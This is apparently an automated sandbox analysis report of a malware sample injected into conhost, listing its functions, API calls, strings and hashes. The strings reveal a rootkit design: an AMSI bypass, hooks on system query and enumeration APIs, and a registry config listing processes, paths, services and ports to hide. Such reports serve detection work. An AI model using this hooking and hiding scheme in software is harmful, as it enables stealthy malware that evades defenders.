8752->8753 8754 1780dd313f5 8753->8754 8756 1780dd3140e 8753->8756 8755 1780dd2d1f4 __free_lconv_num 13 API calls 8754->8755 8757 1780dd313fa 8755->8757 8759 1780dd2dd78 14 API calls 8756->8759 8760 1780dd31405 8756->8760 8758 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8757->8758 8758->8760 8759->8760 8761 1780dd3479d 8764 1780dd2af34 8761->8764 8765 1780dd2af4e 8764->8765 8767 1780dd2af9b 8764->8767 8766 1780dd29324 __CxxCallCatchBlock 9 API calls 8765->8766 8765->8767 8766->8767 9061 1780dd24320 9062 1780dd2426d 9061->9062 9063 1780dd242bd VirtualQuery 9062->9063 9064 1780dd242d7 9062->9064 9065 1780dd24322 GetLastError 9062->9065 9063->9062 9063->9064 9065->9062 8311 1780dd2f820 8314 1780dd2f7d8 8311->8314 8319 1780dd2c558 EnterCriticalSection 8314->8319 8320 1780dd2fe20 8321 1780dd2fe4a 8320->8321 8322 1780dd2d220 _invalid_parameter_noinfo 13 API calls 8321->8322 8323 1780dd2fe6a 8322->8323 8324 1780dd2d2a0 __free_lconv_num 13 API calls 8323->8324 8325 1780dd2fe78 8324->8325 8326 1780dd2d220 _invalid_parameter_noinfo 13 API calls 8325->8326 8329 1780dd2fea2 8325->8329 8328 1780dd2fe94 8326->8328 8327 1780dd2fec1 InitializeCriticalSectionEx 8327->8329 8330 1780dd2d2a0 __free_lconv_num 13 API calls 8328->8330 8329->8327 8331 1780dd2feab 8329->8331 8330->8329

                                            Executed Functions

                                            Function 000001780DD21E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: d1c44051adfd5918ba11a262748e18ce0115dbb471029f5bff1d710b572d5a12
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 1D515C725A8A4AE7FB40DF69ED4E7EC6730AB60744F804512BC0D12566DE7C82DEC3A4
                                            Function 000001780DD21E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 5449bceb9fac7a20e9a1c2bc2914edad5f5e1ecb01d48d5950d9a585fb409348
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: E6D067326E9640D7FB096F59EC9E3EC2271ABA4B01FC44425ED0E022A4DE2D85DD8360
                                            Function 000001780DD23A1C Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 000001780DD23A35
                                            • PathFindFileNameW.SHLWAPI ref: 000001780DD23A44
                                              • Part of subcall function 000001780DD23F88: StrCmpNIW.SHLWAPI(?,?,?,000001780DD2272F), ref: 000001780DD23FA0
                                              • Part of subcall function 000001780DD23EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23EDB
                                              • Part of subcall function 000001780DD23EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F0E
                                              • Part of subcall function 000001780DD23EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F2E
                                              • Part of subcall function 000001780DD23EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F47
                                              • Part of subcall function 000001780DD23EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001780DD23A5B), ref: 000001780DD23F68
                                            • CreateThread.KERNELBASE ref: 000001780DD23A8B
                                              • Part of subcall function 000001780DD21E74: GetCurrentThread.KERNEL32 ref: 000001780DD21E7F
                                              • Part of subcall function 000001780DD21E74: CreateThread.KERNELBASE ref: 000001780DD22043
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22049
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22055
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22061
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD2206D
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22079
                                              • Part of subcall function 000001780DD21E74: TlsAlloc.KERNEL32 ref: 000001780DD22085
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 089838726ad3ddfdaf6dc4d96070e52b67a727f9541ff4bf26b067d5e2e7e576
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: D7111332A9C741C3FBB0AF60AA4D3FD62B0ABA4355F504129BC0E81191EE7CC4DC8630
                                            Function 000001780D3E2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 21fc9abd0b96c54d7afed000eacec5839119025b438fb8b3b3788be1952ce631
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 1F916972B4515087DB54DF25D4087BDB3A1FB46B99F468028EE4E477C8EE34D896C720
                                            Function 000001780DD21BC4 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000001780DD21724: GetProcessHeap.KERNEL32 ref: 000001780DD2172F
                                              • Part of subcall function 000001780DD21724: HeapAlloc.KERNEL32 ref: 000001780DD2173E
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD217AE
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD217DB
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD217F5
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21815
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD21830
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21850
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD2186B
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD2188B
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD218A6
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD218C6
                                            • SleepEx.KERNELBASE ref: 000001780DD21BDF
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD218E1
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21901
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD2191C
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD2193C
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD21957
                                              • Part of subcall function 000001780DD21724: RegOpenKeyExW.ADVAPI32 ref: 000001780DD21977
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD21992
                                              • Part of subcall function 000001780DD21724: RegCloseKey.ADVAPI32 ref: 000001780DD2199C
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: f02d2cf167dda203577f8273320fd16ffbe57001577bb4de581be73cda7a7d63
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: C031CF7928C745C3EB549F26DD4D3FDA3B4AB64BC0F049421BE0D8769ADE28C8D89234

                                            Non-executed Functions

                                            Function 000001780DD22FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 197 1780dd22ff0-1780dd23069 199 1780dd2306f-1780dd23075 197->199 200 1780dd23384-1780dd233a7 197->200 199->200 201 1780dd2307b-1780dd2307e 199->201 201->200 202 1780dd23084-1780dd23087 201->202 202->200 203 1780dd2308d-1780dd2309d GetModuleHandleA 202->203 204 1780dd2309f-1780dd230af GetProcAddress 203->204 205 1780dd230b1 203->205 206 1780dd230b4-1780dd230d2 204->206 205->206 206->200 208 1780dd230d8-1780dd230f7 StrCmpNIW 206->208 208->200 209 1780dd230fd-1780dd23101 208->209 209->200 210 1780dd23107-1780dd23111 209->210 210->200 211 1780dd23117-1780dd2311e 210->211 211->200 212 1780dd23124-1780dd23137 211->212 213 1780dd23139-1780dd23145 212->213 214 1780dd23147 212->214 215 1780dd2314a-1780dd2314e 213->215 214->215 216 1780dd2315e 215->216 217 1780dd23150-1780dd2315c 215->217 218 1780dd23161-1780dd2316b 216->218 217->218 219 1780dd23251-1780dd23255 218->219 220 1780dd23171-1780dd23174 218->220 221 1780dd2325b-1780dd2325e 219->221 222 1780dd23376-1780dd2337e 219->222 223 1780dd23186-1780dd23190 220->223 224 1780dd23176-1780dd23183 call 1780dd21a30 220->224 225 1780dd2326f-1780dd23279 221->225 226 1780dd23260-1780dd2326c call 1780dd21a30 221->226 222->200 222->212 228 1780dd23192-1780dd2319f 223->228 229 1780dd231c4-1780dd231ce 223->229 224->223 233 1780dd2327b-1780dd23288 225->233 234 1780dd232a9-1780dd232ac 225->234 226->225 228->229 236 1780dd231a1-1780dd231ae 228->236 230 1780dd231fe-1780dd23201 229->230 231 1780dd231d0-1780dd231dd 229->231 239 1780dd2320f-1780dd2321c lstrlenW 230->239 240 1780dd23203-1780dd2320d call 1780dd21cc4 230->240 231->230 237 1780dd231df-1780dd231ec 231->237 233->234 241 1780dd2328a-1780dd23297 233->241 242 1780dd232b9-1780dd232c6 lstrlenW 234->242 243 1780dd232ae-1780dd232b7 call 1780dd21cc4 234->243 244 1780dd231b1-1780dd231b7 236->244 245 1780dd231ef-1780dd231f5 237->245 248 1780dd2321e-1780dd2322d call 1780dd21cfc 239->248 249 1780dd2322f-1780dd23241 call 1780dd23f88 239->249 240->239 252 1780dd23247-1780dd2324c 240->252 247 1780dd2329a-1780dd232a0 241->247 253 1780dd232c8-1780dd232d7 call 1780dd21cfc 242->253 254 1780dd232d9-1780dd232e3 call 1780dd23f88 242->254 243->242 260 1780dd232ee-1780dd232f9 243->260 251 1780dd231bd-1780dd231c2 244->251 244->252 245->252 257 1780dd231f7-1780dd231fc 245->257 247->260 261 1780dd232a2-1780dd232a7 247->261 248->249 248->252 249->252 255 1780dd232e6-1780dd232e8 249->255 251->229 251->244 252->255 253->254 253->260 254->255 255->222 255->260 257->230 257->245 267 1780dd232fb-1780dd232ff 260->267 268 1780dd23370-1780dd23374 260->268 261->234 261->247 271 1780dd23301-1780dd23305 267->271 272 1780dd23307-1780dd23321 call 1780dd33a40 267->272 268->222 271->272 273 1780dd23324-1780dd23327 271->273 272->273 276 1780dd2334a-1780dd2334d 273->276 277 1780dd23329-1780dd23347 call 1780dd33a40 273->277 276->268 278 1780dd2334f-1780dd2336d call 1780dd33a40 276->278 277->276 278->268
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: facbdbfb5c2bd2026e9ad8d46df58b599585430ca13e006f5fc0a7da37e4c6aa
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 43B15732258690C3EB698F26990D7EDA3B4FB65B94F44501AFE0D53B94DE3DC988C360
                                            Function 000001780DD284B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 0d91ee97c88c6cbe6dd9bc3f2876700485e0cee5ee8d0f8abd147d7d7cbfc3c7
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 48312A76249B8086EB648F60E8587EE7374F784748F44442AEE4E47B98DF78C68CC720
                                            Function 000001780DD2CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: b27d6ded06ba6228c8eac93f1d2374ba410749ee9fa8e0e26f9ce94f5f475d03
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: C0414A37258B8087EB608F25E8493EE73B4F7887A4F540125EE8D46B99DF38C599CB10
                                            Function 000001780DD2DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 6d09a4e713bcf5874fb5220e5cd0fc4252d0a02e30dbf2e41e5de59597958237
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 15A1E33274C6808AFB209F75A84C7FD6BB2A7A5B94F144115AE8D27A99CE3CC4C9C750
                                            Function 000001780DD21724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: d1af3ab047be10ac5fa37b96b0a24860e98f111ab63e272c0f8898280e10850b
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: A771F737294B51C6EB209F65E89D6ED23B4FB94B88F405221EE4D57B68DE39C488C360
                                            Function 000001780DD212B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 80c95c9ac1173ddcc67762c0d4d7ee201d131de7aa9407c957e163cac6628e32
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: B6510632658B849BE724CF62E84D3AE77A1F788B98F448124EE4D47758DF3CC1898650
                                            Function 000001780DD2EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: c4b2bfe7d71514561908e973b20ec2ade3c644f527c0fd213ff56bfb94d96315
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: D7518132788A4492FB159F66A94D3ED2270AB58BB0F480B25AD3D473D4DF3CD4898660
                                            Function 000001780DD233A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: e8285e53e097174cf9a0ee45c9ec55d3c79a3565f624c9432db9507d82edc9a7
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: A5317F32648B40D7F721DF12A80C7ADA3B4F798B95F444529EE8D43624DF3CC59A8750
